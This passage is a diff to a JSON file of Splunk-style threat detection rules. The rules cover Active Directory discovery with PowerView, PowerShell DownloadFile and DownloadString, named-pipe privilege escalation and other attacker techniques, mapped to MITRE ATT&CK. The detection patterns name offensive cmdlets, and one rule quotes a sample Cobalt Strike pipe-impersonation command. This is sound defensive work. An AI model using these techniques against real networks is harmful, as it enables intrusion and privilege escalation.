Group", + "Sandworm Team", + "Turla", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, + { + "name": "Windows Find Interesting ACL with FindInterestingDomainAcl", + "description": "This analytic leverages PowerShell Script Block Logging (EventCode=4104) to detect the execution of the `Find-InterestingDomainAcl` commandlet. `Find-InterestingDomainAcl` is part of PowerView, a PowerShell toolkit designed for Windows domain enumeration. Detecting the use of `Find-InterestingDomainAcl` is crucial as adversaries and Red Teams might employ it to identify unusual or misconfigured Access Control Lists (ACLs) within the domain. Such ACLs can provide attackers with insights into potential privilege escalation opportunities or weak security postures within Active Directory.", + "search": "`powershell` EventCode=4104 ScriptBlockText = \"*Find-InterestingDomainAcl*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_find_interesting_acl_with_findinterestingdomainacl_filter`", + "tags": { + "name": "Windows Find Interesting ACL with FindInterestingDomainAcl", + "analytic_story": [ + "Active Directory Discovery" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "Suspicious PowerShell Find-InterestingDomainAcl was identified on endpoint $dest$ by user $user$.", + "mitre_attack_id": [ + "T1087", + "T1087.002" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1087.002", + "mitre_attack_technique": "Domain Account", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "BRONZE BUTLER", + "Chimera", + "Dragonfly", + "FIN6", + "Fox Kitten", + "Ke3chang", + "LAPSUS$", + "MuddyWater", + "OilRig", + "Poseidon Group", + "Sandworm Team", + "Turla", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, + { + "name": "Windows Forest Discovery with GetForestDomain", + "description": "This analytic utilizes PowerShell Script Block Logging (EventCode=4104) to detect the execution of the `Get-ForestDomain` commandlet. `Get-ForestDomain` is a component of PowerView, a PowerShell toolkit designed for Windows domain enumeration. Detecting the use of `Get-ForestDomain` is essential as adversaries and Red Teams might employ it to gain insights into the forest and domain configurations of an Active Directory environment. Such information can provide attackers with a broader understanding of the domain structure and potential avenues for lateral movement or privilege escalation.", + "search": "`powershell` EventCode=4104 ScriptBlockText = \"*Get-ForestDomain*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_forest_discovery_with_getforestdomain_filter`", + "tags": { + "name": "Windows Forest Discovery with GetForestDomain", + "analytic_story": [ + "Active Directory Discovery" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "Suspicious PowerShell Get-ForestDomain was identified on endpoint $dest$ by user $user$.", + "mitre_attack_id": [ + "T1087", + "T1087.002" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1087.002", + "mitre_attack_technique": "Domain Account", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "BRONZE BUTLER", + "Chimera", + "Dragonfly", + "FIN6", + "Fox Kitten", + "Ke3chang", + "LAPSUS$", + "MuddyWater", + "OilRig", + "Poseidon Group", + "Sandworm Team", + "Turla", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, + { + "name": "Windows Get Local Admin with FindLocalAdminAccess", + "description": "This analytic leverages PowerShell Script Block Logging (EventCode=4104) to detect the execution of the `Find-LocalAdminAccess` commandlet. `Find-LocalAdminAccess` is part of PowerView, a PowerShell toolkit designed for Windows domain enumeration. Detecting the use of `Find-LocalAdminAccess` is vital as adversaries and Red Teams might employ it to identify machines where the current user context has local administrator access. Such information can provide attackers with potential targets for lateral movement or privilege escalation within the network.", + "search": "`powershell` EventCode=4104 ScriptBlockText = \"*Find-LocalAdminAccess*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_get_local_admin_with_findlocaladminaccess_filter`", + "tags": { + "name": "Windows Get Local Admin with FindLocalAdminAccess", + "analytic_story": [ + "Active Directory Discovery" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "Suspicious PowerShell Find-LocalAdminAccess was identified on endpoint $dest$ by user $user$.", + "mitre_attack_id": [ + "T1087", + "T1087.002" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1087.002", + "mitre_attack_technique": "Domain Account", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "BRONZE BUTLER", + "Chimera", + "Dragonfly", + "FIN6", + "Fox Kitten", + "Ke3chang", + "LAPSUS$", + "MuddyWater", + "OilRig", + "Poseidon Group", + "Sandworm Team", + "Turla", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, { "name": "Windows Linked Policies In ADSI Discovery", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain groups. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain organizational unit for situational awareness and Active Directory Discovery.", @@ -373669,116 +376998,307 @@ ] }, { - "mitre_attack_id": "T1087", - "mitre_attack_technique": "Account Discovery", + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + } + ] + } + }, + { + "name": "Windows Special Privileged Logon On Multiple Hosts", + "description": "The following analytic leverages Event ID 4672 to identify a source user authenticating with special privileges across a large number remote endpoints. Specifically, the logic will trigger when a source user obtains special privileges across 30 or more target computers within a 5 minute timespan. Special privileges are assigned to a new logon session when sensitive privileges like SeDebugPrivilege and SeImpersonatePrivilege are assigned. This behavior could represent an adversary who is moving laterally and executing remote code across the network. It can also be triggered by other behavior like an adversary enumerating network shares. As environments differ across organizations, security teams should customize the thresholds of this detection as needed.", + "search": " `wineventlog_security` EventCode=4672 AND NOT(Caller_User_Name IN (\"DWM-1\",\"DWM-2\",\"DWM-3\",\"LOCAL SERVICE\",\"NETWORK SERVICE\",\"SYSTEM\",\"*$\")) | bucket span=5m _time | stats dc(Computer) AS unique_targets values(Computer) as host_targets values(PrivilegeList) as privileges by _time, Caller_User_Name | where unique_targets > 30 | `windows_special_privileged_logon_on_multiple_hosts_filter`", + "tags": { + "name": "Windows Special Privileged Logon On Multiple Hosts", + "analytic_story": [ + "Active Directory Privilege Escalation", + "Active Directory Lateral Movement" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "A source user $Caller_User_Name$ obtained special privileges on a large number of endpoints within 5 minutes.", + "mitre_attack_id": [ + "T1087", + "T1021.002", + "T1135" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "Computer", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "Caller_User_Name", + "type": "User", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 64, + "security_domain": "endpoint", + "risk_severity": "medium", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1021.002", + "mitre_attack_technique": "SMB/Windows Admin Shares", + "mitre_attack_tactics": [ + "Lateral Movement" + ], + "mitre_attack_groups": [ + "APT28", + "APT3", + "APT32", + "APT39", + "APT41", + "Blue Mockingbird", + "Chimera", + "Deep Panda", + "FIN8", + "Fox Kitten", + "Ke3chang", + "Lazarus Group", + "Moses Staff", + "Orangeworm", + "Sandworm Team", + "Threat Group-1314", + "Turla", + "Wizard Spider" + ] + }, + { + "mitre_attack_id": "T1135", + "mitre_attack_technique": "Network Share Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "APT1", + "APT32", + "APT38", + "APT39", + "APT41", + "Chimera", + "DarkVishnya", + "Dragonfly", + "Sowbug", + "Tonto Team", + "Tropic Trooper", + "Wizard Spider" + ] + } + ] + } + }, + { + "name": "Windows Suspect Process With Authentication Traffic", + "description": "This analytic identifies executables running from public or temporary locations that are communicating over windows domain authentication ports/protocol. The ports/protocols include LDAP(389), LDAPS(636), and Kerberos(88). Authentications from applications running from user controlled locations may not be malicious, however actors often attempt to access domain resources after initial compromise from executables in these locations.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(All_Traffic.process_id) as process_id from datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port IN (\"88\",\"389\",\"636\") AND All_Traffic.app IN (\"*\\\\users\\\\*\", \"*\\\\programdata\\\\*\", \"*\\\\temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\appdata\\\\*\", \"*\\\\perflogs\\\\*\") by All_Traffic.app,All_Traffic.src,All_Traffic.src_ip,All_Traffic.user,All_Traffic.dest,All_Traffic.dest_ip,All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rex field=app \".*\\\\\\(?.*)$\" | rename app as process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_suspect_process_with_authentication_traffic_filter`", + "tags": { + "name": "Windows Suspect Process With Authentication Traffic", + "analytic_story": [ + "Active Directory Discovery" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation", + "Installation" + ], + "message": "The process $process_name$ on $src$ has been communicating with $dest$ on $dest_port$.", + "mitre_attack_id": [ + "T1087", + "T1087.002", + "T1204", + "T1204.002" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "src", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User Name", + "role": [ + "Victim" + ] + }, + { + "name": "process_name", + "type": "Other", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1087.002", + "mitre_attack_technique": "Domain Account", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "BRONZE BUTLER", + "Chimera", + "Dragonfly", + "FIN6", + "Fox Kitten", + "Ke3chang", + "LAPSUS$", + "MuddyWater", + "OilRig", + "Poseidon Group", + "Sandworm Team", + "Turla", + "Wizard Spider", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1204", + "mitre_attack_technique": "User Execution", "mitre_attack_tactics": [ - "Discovery" + "Execution" ], - "mitre_attack_groups": [] - } - ] - } - }, - { - "name": "Windows Special Privileged Logon On Multiple Hosts", - "description": "The following analytic leverages Event ID 4672 to identify a source user authenticating with special privileges across a large number remote endpoints. Specifically, the logic will trigger when a source user obtains special privileges across 30 or more target computers within a 5 minute timespan. Special privileges are assigned to a new logon session when sensitive privileges like SeDebugPrivilege and SeImpersonatePrivilege are assigned. This behavior could represent an adversary who is moving laterally and executing remote code across the network. It can also be triggered by other behavior like an adversary enumerating network shares. As environments differ across organizations, security teams should customize the thresholds of this detection as needed.", - "search": " `wineventlog_security` EventCode=4672 AND NOT(Caller_User_Name IN (\"DWM-1\",\"DWM-2\",\"DWM-3\",\"LOCAL SERVICE\",\"NETWORK SERVICE\",\"SYSTEM\",\"*$\")) | bucket span=5m _time | stats dc(Computer) AS unique_targets values(Computer) as host_targets values(PrivilegeList) as privileges by _time, Caller_User_Name | where unique_targets > 30 | `windows_special_privileged_logon_on_multiple_hosts_filter`", - "tags": { - "name": "Windows Special Privileged Logon On Multiple Hosts", - "analytic_story": [ - "Active Directory Privilege Escalation", - "Active Directory Lateral Movement" - ], - "asset_type": "Endpoint", - "cis20": [ - "CIS 10" - ], - "kill_chain_phases": [ - "Exploitation" - ], - "message": "A source user $Caller_User_Name$ obtained special privileges on a large number of endpoints within 5 minutes.", - "mitre_attack_id": [ - "T1087", - "T1021.002", - "T1135" - ], - "nist": [ - "DE.CM" - ], - "observable": [ - { - "name": "Computer", - "type": "Hostname", - "role": [ - "Victim" - ] - }, - { - "name": "Caller_User_Name", - "type": "User", - "role": [ - "Attacker" + "mitre_attack_groups": [ + "LAPSUS$" ] - } - ], - "risk_score": 64, - "security_domain": "endpoint", - "risk_severity": "medium", - "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1087", - "mitre_attack_technique": "Account Discovery", - "mitre_attack_tactics": [ - "Discovery" - ], - "mitre_attack_groups": [] }, { - "mitre_attack_id": "T1021.002", - "mitre_attack_technique": "SMB/Windows Admin Shares", + "mitre_attack_id": "T1204.002", + "mitre_attack_technique": "Malicious File", "mitre_attack_tactics": [ - "Lateral Movement" + "Execution" ], "mitre_attack_groups": [ + "APT-C-36", + "APT12", + "APT19", "APT28", - "APT3", + "APT29", + "APT30", "APT32", + "APT33", + "APT37", + "APT38", "APT39", - "APT41", - "Blue Mockingbird", - "Chimera", - "Deep Panda", + "Ajax Security Team", + "Andariel", + "Aoqin Dragon", + "BITTER", + "BRONZE BUTLER", + "BlackTech", + "CURIUM", + "Cobalt Group", + "Confucius", + "Dark Caracal", + "DarkHydrus", + "Darkhotel", + "Dragonfly", + "EXOTIC LILY", + "Earth Lusca", + "Elderwood", + "Ember Bear", + "FIN4", + "FIN6", + "FIN7", "FIN8", - "Fox Kitten", - "Ke3chang", + "Ferocious Kitten", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HEXANE", + "Higaisa", + "Inception", + "IndigoZebra", + "Indrik Spider", + "Kimsuky", "Lazarus Group", - "Moses Staff", - "Orangeworm", + "LazyScripter", + "Leviathan", + "Machete", + "Magic Hound", + "Mofang", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Naikon", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + "PROMETHIUM", + "Patchwork", + "RTM", + "Rancor", "Sandworm Team", - "Threat Group-1314", - "Turla", - "Wizard Spider" - ] - }, - { - "mitre_attack_id": "T1135", - "mitre_attack_technique": "Network Share Discovery", - "mitre_attack_tactics": [ - "Discovery" - ], - "mitre_attack_groups": [ - "APT1", - "APT32", - "APT38", - "APT39", - "APT41", - "Chimera", - "DarkVishnya", - "Dragonfly", - "Sowbug", + "SideCopy", + "Sidewinder", + "Silence", + "TA459", + "TA505", + "TA551", + "The White Company", + "Threat Group-3390", "Tonto Team", + "Transparent Tribe", "Tropic Trooper", - "Wizard Spider" + "WIRTE", + "Whitefly", + "Windshift", + "Wizard Spider", + "admin@338", + "menuPass" ] } ] @@ -378167,7 +381687,7 @@ { "name": "Any Powershell DownloadFile", "description": "The following analytic identifies the use of PowerShell downloading a file using `DownloadFile` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*DownloadFile* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `any_powershell_downloadfile_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*DownloadFile* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `any_powershell_downloadfile_filter`", "tags": { "name": "Any Powershell DownloadFile", "analytic_story": [ @@ -378410,7 +381930,7 @@ { "name": "Any Powershell DownloadString", "description": "The following analytic identifies the use of PowerShell downloading a file using `DownloadString` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*.DownloadString* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `any_powershell_downloadstring_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*.DownloadString* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `any_powershell_downloadstring_filter`", "tags": { "name": "Any Powershell DownloadString", "analytic_story": [ @@ -378659,7 +382179,8 @@ "name": "CHCP Command Execution", "analytic_story": [ "IcedID", - "Azorult" + "Azorult", + "Forest Blizzard" ], "asset_type": "Endpoint", "cis20": [ @@ -378741,7 +382262,8 @@ "Data Destruction", "Living Off The Land", "Azorult", - "Data Destruction" + "Data Destruction", + "Warzone RAT" ], "asset_type": "Endpoint", "automated_detection_testing": "passed", @@ -378844,71 +382366,261 @@ ] }, { - "mitre_attack_id": "T1059", - "mitre_attack_technique": "Command and Scripting Interpreter", + "mitre_attack_id": "T1059", + "mitre_attack_technique": "Command and Scripting Interpreter", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT32", + "APT37", + "APT39", + "Dragonfly", + "FIN5", + "FIN6", + "FIN7", + "Fox Kitten", + "Ke3chang", + "OilRig", + "Stealth Falcon", + "Whitefly", + "Windigo" + ] + } + ] + } + }, + { + "name": "CMD Echo Pipe - Escalation", + "description": "This analytic identifies a common behavior by Cobalt Strike and other frameworks where the adversary will escalate privileges, either via `jump` (Cobalt Strike PTH) or `getsystem`, using named-pipe impersonation. A suspicious event will look like `cmd.exe /c echo 4sgryt3436 > \\\\.\\Pipe\\5erg53`.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` OR Processes.process=*%comspec%* (Processes.process=*echo* AND Processes.process=*pipe*) by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmd_echo_pipe___escalation_filter`", + "tags": { + "name": "CMD Echo Pipe - Escalation", + "analytic_story": [ + "BlackByte Ransomware", + "Cobalt Strike", + "Graceful Wipe Out Attack" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Installation", + "Exploitation" + ], + "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ potentially performing privilege escalation using named pipes related to Cobalt Strike and other frameworks.", + "mitre_attack_id": [ + "T1059", + "T1059.003", + "T1543.003", + "T1543" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "parent_process_name", + "type": "Process", + "role": [ + "Parent Process" + ] + }, + { + "name": "process_name", + "type": "Process", + "role": [ + "Child Process" + ] + } + ], + "risk_score": 64, + "security_domain": "endpoint", + "risk_severity": "medium", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1059", + "mitre_attack_technique": "Command and Scripting Interpreter", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT32", + "APT37", + "APT39", + "Dragonfly", + "FIN5", + "FIN6", + "FIN7", + "Fox Kitten", + "Ke3chang", + "OilRig", + "Stealth Falcon", + "Whitefly", + "Windigo" + ] + }, + { + "mitre_attack_id": "T1059.003", + "mitre_attack_technique": "Windows Command Shell", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT1", + "APT18", + "APT28", + "APT3", + "APT32", + "APT37", + "APT38", + "APT41", + "Aquatic Panda", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Dark Caracal", + "Darkhotel", + "Dragonfly", + "Ember Bear", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "Higaisa", + "Indrik Spider", + "Ke3chang", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Machete", + "Magic Hound", + "Metador", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "Patchwork", + "Rancor", + "Silence", + "Sowbug", + "Suckfly", + "TA505", + "TA551", + "TeamTNT", + "Threat Group-1314", + "Threat Group-3390", + "Tropic Trooper", + "Turla", + "Wizard Spider", + "ZIRCONIUM", + "admin@338", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1543.003", + "mitre_attack_technique": "Windows Service", "mitre_attack_tactics": [ - "Execution" + "Persistence", + "Privilege Escalation" ], "mitre_attack_groups": [ "APT19", + "APT3", "APT32", - "APT37", - "APT39", - "Dragonfly", - "FIN5", - "FIN6", + "APT38", + "APT41", + "Blue Mockingbird", + "Carbanak", + "Cobalt Group", + "DarkVishnya", + "Earth Lusca", "FIN7", - "Fox Kitten", "Ke3chang", - "OilRig", - "Stealth Falcon", - "Whitefly", - "Windigo" + "Kimsuky", + "Lazarus Group", + "PROMETHIUM", + "TeamTNT", + "Threat Group-3390", + "Tropic Trooper", + "Wizard Spider" ] + }, + { + "mitre_attack_id": "T1543", + "mitre_attack_technique": "Create or Modify System Process", + "mitre_attack_tactics": [ + "Persistence", + "Privilege Escalation" + ], + "mitre_attack_groups": [] } ] } }, { - "name": "CMD Echo Pipe - Escalation", - "description": "This analytic identifies a common behavior by Cobalt Strike and other frameworks where the adversary will escalate privileges, either via `jump` (Cobalt Strike PTH) or `getsystem`, using named-pipe impersonation. A suspicious event will look like `cmd.exe /c echo 4sgryt3436 > \\\\.\\Pipe\\5erg53`.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` OR Processes.process=*%comspec%* (Processes.process=*echo* AND Processes.process=*pipe*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmd_echo_pipe___escalation_filter`", + "name": "Cmdline Tool Not Executed In CMD Shell", + "description": "The following analytic identifies a non-standard parent process (not matching CMD, PowerShell, or Explorer) spawning `ipconfig.exe` or `systeminfo.exe`. This particular behavior was seen in FIN7's JSSLoader .NET payload. This is also typically seen when an adversary is injected into another process performing different discovery techniques. This event stands out as a TTP since these tools are commonly executed with a shell application or Explorer parent, and not by another application. This TTP is a good indicator for an adversary gathering host information, but one possible false positive might be an automated tool used by a system administator.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = \"ipconfig.exe\" OR Processes.process_name = \"systeminfo.exe\" OR Processes.process_name = \"net.exe\" OR Processes.process_name = \"net1.exe\" OR Processes.process_name = \"arp.exe\" OR Processes.process_name = \"nslookup.exe\" OR Processes.process_name = \"route.exe\" OR Processes.process_name = \"netstat.exe\" OR Processes.process_name = \"whoami.exe\") AND NOT (Processes.parent_process_name = \"cmd.exe\" OR Processes.parent_process_name = \"powershell*\" OR Processes.parent_process_name=\"pwsh.exe\" OR Processes.parent_process_name = \"explorer.exe\") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.original_file_name Processes.process_id Processes.process Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmdline_tool_not_executed_in_cmd_shell_filter`", "tags": { - "name": "CMD Echo Pipe - Escalation", + "name": "Cmdline Tool Not Executed In CMD Shell", "analytic_story": [ - "BlackByte Ransomware", - "Cobalt Strike", - "Graceful Wipe Out Attack" + "FIN7", + "Qakbot", + "CISA AA22-277A", + "Qakbot", + "Volt Typhoon" ], "asset_type": "Endpoint", "cis20": [ "CIS 10" ], "kill_chain_phases": [ - "Installation", - "Exploitation" + "Installation" ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ potentially performing privilege escalation using named pipes related to Cobalt Strike and other frameworks.", + "message": "A non-standard parent process $parent_process_name$ spawned child process $process_name$ to execute command-line tool on $dest$.", "mitre_attack_id": [ "T1059", - "T1059.003", - "T1543.003", - "T1543" + "T1059.007" ], "nist": [ "DE.CM" ], "observable": [ { - "name": "user", - "type": "User", + "name": "dest", + "type": "Endpoint", "role": [ "Victim" ] }, { - "name": "dest", - "type": "Hostname", + "name": "user", + "type": "User", "role": [ "Victim" ] @@ -378928,7 +382640,7 @@ ] } ], - "risk_score": 64, + "risk_score": 56, "security_domain": "endpoint", "risk_severity": "medium", "mitre_attack_enrichments": [ @@ -378956,134 +382668,58 @@ ] }, { - "mitre_attack_id": "T1059.003", - "mitre_attack_technique": "Windows Command Shell", + "mitre_attack_id": "T1059.007", + "mitre_attack_technique": "JavaScript", "mitre_attack_tactics": [ "Execution" ], "mitre_attack_groups": [ - "APT1", - "APT18", - "APT28", - "APT3", "APT32", - "APT37", - "APT38", - "APT41", - "Aquatic Panda", - "BRONZE BUTLER", - "Blue Mockingbird", - "Chimera", "Cobalt Group", - "Dark Caracal", - "Darkhotel", - "Dragonfly", + "Earth Lusca", "Ember Bear", - "FIN10", + "Evilnum", "FIN6", "FIN7", - "FIN8", - "Fox Kitten", - "GALLIUM", - "Gamaredon Group", - "Gorgon Group", - "HAFNIUM", "Higaisa", "Indrik Spider", - "Ke3chang", "Kimsuky", - "Lazarus Group", "LazyScripter", - "Machete", - "Magic Hound", - "Metador", + "Leafminer", + "Molerats", "MuddyWater", - "Mustang Panda", - "Nomadic Octopus", - "OilRig", - "Patchwork", - "Rancor", + "Sidewinder", "Silence", - "Sowbug", - "Suckfly", "TA505", - "TA551", - "TeamTNT", - "Threat Group-1314", - "Threat Group-3390", - "Tropic Trooper", - "Turla", - "Wizard Spider", - "ZIRCONIUM", - "admin@338", - "menuPass" - ] - }, - { - "mitre_attack_id": "T1543.003", - "mitre_attack_technique": "Windows Service", - "mitre_attack_tactics": [ - "Persistence", - "Privilege Escalation" - ], - "mitre_attack_groups": [ - "APT19", - "APT3", - "APT32", - "APT38", - "APT41", - "Blue Mockingbird", - "Carbanak", - "Cobalt Group", - "DarkVishnya", - "Earth Lusca", - "FIN7", - "Ke3chang", - "Kimsuky", - "Lazarus Group", - "PROMETHIUM", - "TeamTNT", - "Threat Group-3390", - "Tropic Trooper", - "Wizard Spider" + "Turla" ] - }, - { - "mitre_attack_id": "T1543", - "mitre_attack_technique": "Create or Modify System Process", - "mitre_attack_tactics": [ - "Persistence", - "Privilege Escalation" - ], - "mitre_attack_groups": [] } ] } }, { - "name": "Cmdline Tool Not Executed In CMD Shell", - "description": "The following analytic identifies a non-standard parent process (not matching CMD, PowerShell, or Explorer) spawning `ipconfig.exe` or `systeminfo.exe`. This particular behavior was seen in FIN7's JSSLoader .NET payload. This is also typically seen when an adversary is injected into another process performing different discovery techniques. This event stands out as a TTP since these tools are commonly executed with a shell application or Explorer parent, and not by another application. This TTP is a good indicator for an adversary gathering host information, but one possible false positive might be an automated tool used by a system administator.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = \"ipconfig.exe\" OR Processes.process_name = \"systeminfo.exe\" OR Processes.process_name = \"net.exe\" OR Processes.process_name = \"net1.exe\" OR Processes.process_name = \"arp.exe\" OR Processes.process_name = \"nslookup.exe\" OR Processes.process_name = \"route.exe\" OR Processes.process_name = \"netstat.exe\" OR Processes.process_name = \"whoami.exe\") AND NOT 